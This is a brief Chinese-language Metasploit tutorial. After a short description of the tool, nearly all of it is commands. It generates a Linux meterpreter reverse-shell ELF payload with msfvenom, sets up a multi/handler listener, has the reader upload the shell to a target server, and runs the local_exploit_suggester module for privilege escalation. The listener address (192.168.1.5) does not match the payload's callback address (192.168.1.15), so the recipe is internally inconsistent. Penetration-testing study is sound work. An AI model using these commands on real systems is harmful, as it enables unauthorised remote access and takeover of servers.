1、简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的
缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代
码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
生成shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=5555 -f elf > shell.elf
监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.5
set lport 5555
exploit
将shell上传到目标服务器并访问就会获取session
使用模块查询漏洞
run post/multi/recon/local_exploit_suggester
使用模块提权如果成功会有session会话返回
